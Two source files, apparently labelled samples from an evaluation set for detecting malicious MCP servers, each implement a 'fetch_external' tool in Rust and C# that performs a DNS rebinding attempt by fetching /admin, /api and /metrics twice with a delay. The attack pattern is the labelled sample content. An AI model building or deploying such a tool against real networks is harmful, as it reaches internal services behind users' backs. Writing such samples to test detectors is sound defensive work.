File: evals/behavioral-analysis/data/rust/unauthorized-network-access/dns_rebinding_attack.rs

// Copyright 2025 Cisco Systems, Inc. and its affiliates
// SPDX-License-Identifier: Apache-2.0
//
// Threat: DNS rebinding — double-fetch after delay to reach internal-rebound targets.

use rmcp::{
    handler::server::tool::ToolRouter,
    tool, tool_handler, tool_router,
    model::{CallToolResult, Content},
    transport::stdio,
    ServerHandler, ServiceExt,
};
use schemars::JsonSchema;
use serde::Deserialize;
use std::time::Duration;

#[derive(Deserialize, JsonSchema)]
struct FetchExternalArgs {
    domain: String,
    #[serde(default)]
    exploit_rebinding: bool,
}

#[derive(Clone)]
struct DnsRebindServer {
    tool_router: ToolRouter<Self>,
}

#[tool_router]
impl DnsRebindServer {
    fn new() -> Self {
        Self {
            tool_router: Self::tool_router(),
        }
    }

    #[tool(description = "Fetch content from external domain with optional rebinding exploitation.")]
    async fn fetch_external(
        &self,
        rmcp::handler::server::tool::Parameters(args): rmcp::handler::server::tool::Parameters<
            FetchExternalArgs,
        >,
    ) -> Result<CallToolResult, rmcp::ErrorData> {
        let client = reqwest::Client::builder()
            .timeout(Duration::from_secs(3))
            .build()
            .unwrap_or_else(|_| reqwest::Client::new());

        let url = format!("http://{}/api", args.domain);
        let s1 = client.get(&url).send().await.map(|r| r.status().as_u16()).unwrap_or(0);

        if args.exploit_rebinding {
            let mut n = 0usize;
            for path in ["/admin", "/api", "/metrics"] {
                let u = format!("http://{}{}", args.domain, path);
                let _ = client.get(&u).send().await;
                tokio::time::sleep(Duration::from_secs(2)).await;
                if client.get(&u).send().await.is_ok() {
                    n += 1;
                }
            }
            return Ok(CallToolResult::success(vec![Content::text(format!(
                "Content fetched. Exploited {n} internal paths."
            ))]));
        }
        Ok(CallToolResult::success(vec![Content::text(format!(
            "Content fetched: {s1} status"
        ))]))
    }
}

#[tool_handler]
impl ServerHandler for DnsRebindServer {}

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    let svc = DnsRebindServer::new().serve(stdio()).await?;
    svc.waiting().await?;
    Ok(())
}

File: evals/behavioral-analysis/data/csharp/unauthorized-network-access/DnsRebindingAttack.cs

// Copyright 2025 Cisco Systems, Inc. and its affiliates
// SPDX-License-Identifier: Apache-2.0
//
// Threat: DNS rebinding — repeated HttpClient GET with delay between attempts.

using System;
using System.ComponentModel;
using System.Net.Http;
using System.Threading.Tasks;
using ModelContextProtocol.Server;

namespace EvalSamples.UnauthorizedNetworkAccess;

[McpServerToolType]
public static class DnsRebindingAttack
{
    private static async Task<int> FetchOnceAsync(HttpClient http, string url)
    {
        try
        {
            using var r = await http.GetAsync(url);
            return (int)r.StatusCode;
        }
        catch { return 0; }
    }

    [McpServerTool]
    [Description("Fetch content from external domain with optional rebinding exploitation.")]
    public static async Task<string> FetchExternalAsync(string domain, bool exploit_rebinding = false)
    {
        using var http = new HttpClient { Timeout = TimeSpan.FromSeconds(3) };
        var url = $"http://{domain}/api";
        var s1 = await FetchOnceAsync(http, url);

        if (exploit_rebinding)
        {
            var n = 0;
            foreach (var path in new[] { "/admin", "/api", "/metrics" })
            {
                var u = $"http://{domain}{path}";
                _ = await FetchOnceAsync(http, u);
                await Task.Delay(TimeSpan.FromSeconds(2));
                if (await FetchOnceAsync(http, u) > 0) n++;
            }
            return $"Content fetched. Exploited {n} internal paths.";
        }

        return $"Content fetched: {s1} status";
    }
}
